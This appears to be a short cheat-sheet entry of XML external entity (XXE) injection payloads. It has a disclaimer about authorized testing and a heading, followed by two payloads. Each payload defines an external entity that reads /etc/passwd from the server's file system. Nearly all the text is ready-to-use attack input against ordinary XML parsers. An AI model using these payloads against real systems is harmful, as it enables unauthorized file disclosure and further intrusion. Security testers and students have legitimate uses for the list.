These payloads are for authorized security testing and educational purposes only. Use responsibly and only on systems you own or have explicit permission to test.
๐
XXE Payloads
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>